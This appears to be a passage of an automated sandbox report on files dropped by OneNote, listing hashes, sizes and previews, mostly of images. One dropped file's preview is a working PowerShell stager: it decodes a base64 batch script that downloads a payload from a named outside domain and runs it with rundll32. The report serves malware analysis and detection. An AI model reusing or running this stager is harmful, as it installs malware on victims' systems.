Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Temp\{4A5F81B1-6EDC-4CFB-B0CD-453CC13CDCF8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.648320495309248
Encrypted:	false
SSDEEP:	6:RauV/FYyfB3h1RRXUnfwd13/JBt9FFBl/FK59JnP9NrRujlw//0lweI/iC9NxRuZ:Ra0/FYyf9/Ufu1xpFFBtRWf/ix
MD5:	19BCE70B943E06D51C590EB847FC5F01
SHA1:	CD1AADD87DC3DC0DD4F8971BB36A72AB06DA182B
SHA-256:	0297E137A9C8FDD73570004F09E177A08153D18FEFF551A0B1F2101CF626E988
SHA-512:	3AE9F47851900660448433E69EEC67A99A8CF52F1BF749DD44E725130A7B081EE4E94BAD6821BBB466AC7F75DB7D527870AAC7E42BA30DC297B33EFF71ACF080
Malicious:	false
Preview:	./.C..vL....W"v_=.G.../L.:s...~.................?.....I...............................................................................................................h.................................................H...S............q...#.G...4.u.;............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{4BA3B8EA-997A-4C53-A890-252850AC82E0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Temp\{4F77B4C2-CBE3-4EFA-8217-B8F83A812D3A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Temp\{50E7BE13-3F2D-4259-8574-FB4059354854}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (380), with no line terminators
Category:	dropped
Size (bytes):	380
Entropy (8bit):	5.853345406863477
Encrypted:	false
SSDEEP:	6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSP8A/lKaHoyCRjpm+Rs3FEY9hMS/aXXrZQ:ssLgyaI4HPKC2EwgvBSU6Ij4+RIFE4qg
MD5:	4B1934D97AE633B5C88F3424B4953761
SHA1:	9EADA74C008237311CBA7367A69A9D291ACE70F2
SHA-256:	74B3A5F20FDB37F8F26025E768EDDDCC08568542402033955C97AF6D8E5D61B4
SHA-512:	04980D507ACC647FA732429DCBB71632FB0F410523E56E39C32F0B89ECA342967DFFC4316B97D0881ABC0C1E7AC2D1A8AAC39B33D00EE0763076A1B65FD2FB99
Malicious:	false
Preview:	powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd

C:\Users\user\AppData\Local\Temp\{523537F5-238A-42F4-9ACD-3ACB2F2F6622}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Temp\{5263DCB2-3486-40DF-B136-195E04DB7FF8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6472187479575893
Encrypted:	false
SSDEEP:	6:Ran/bYyfB3h1RRXUnfolmLig3ImNFFBl/FKLVPykPtRujlw//0lweI/VPHRujd:RanTYyf9/UfogLig4QFFBtaJlCWf/JG
MD5:	7AAFFE52420042408F1373BDF980755D
SHA1:	61863304564A8CC07D48753C1A8DB33200A84D4C
SHA-256:	A82284F7D929806622B9F42C90CCA91AA2022BDEFA75A8E1690457798F25EB25
SHA-512:	D0F8FDAC8EBC2F7B80F3679EA9579A6A5269BB95944C13DE5D17C4A960AB2032C4877110640AE7D984441F237E1ED63D21F39FD2D6C002A0D638CC957EB963DB
Malicious:	false
Preview:	./.C..vL....W"v_../%&!A.8.T..L................?.....I...............................................................................................................h.............................................T,*.hA. xFY..D.........3.a...O.rB...@.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{5A2868A1-8DE0-442E-8D6F-97928FFB4922}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{5A5E8107-CE6B-4914-BC2D-1AAAEF8E1591}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Temp\{5FA0CF7B-F7C2-42AC-B5D3-4E8AB4B60317}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Temp\{62465692-924B-45EF-A7D5-9F49AEBC2043}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6466977807143324
Encrypted:	false
SSDEEP:	6:RaCUFYyfB3h1RRXUnfwOlqBNW/nFFBl/FKcsl7Cbsl/rRujlw//0lweI/g1sl/xm:RaCeYyf9/UfwdW/nFFBt8l+AlMWf/7lU
MD5:	103FC445071CF0A3F37DF1EC54F48F17
SHA1:	A0ACFB9F7B35F42BFC3B88C94D6000CECF4027FC
SHA-256:	F4A78021ACB4FC45193DE906DFC08E92E2CDE975545C323D47969A01ADAA0D42
SHA-512:	3A70B7414A2085F34C7CB69A5D411298583CD76DA23B59DE9ED8EA7C1EE5F087DD98E41CA187F2D112F590C5C5CBE0ADD192802B0C50195141E7CFB991A288C5
Malicious:	false
Preview:	./.C..vL....W"v_..!.~G..~...................?.....I...............................................................................................................h............................................$..U..E...K.7b;..........:.B..C.Q..z.5z............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{63F968EA-4ED0-4F2C-91B9-3FDEE78F659B}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Temp\{643A169F-1F1A-4582-862B-D9A44880C51F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Temp\{656845EC-250E-47C5-A969-FB4CAC16FAFB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Temp\{66452320-E51F-4E77-BCAE-CA1644AF361D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Temp\{66F8E1E8-1369-43C4-916F-A009D3D7AF75}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Temp\{671D2CE2-9423-4A23-8465-65D0C8CF260D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Temp\{698A08B9-E475-4CC1-88C7-580EA14B9349}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
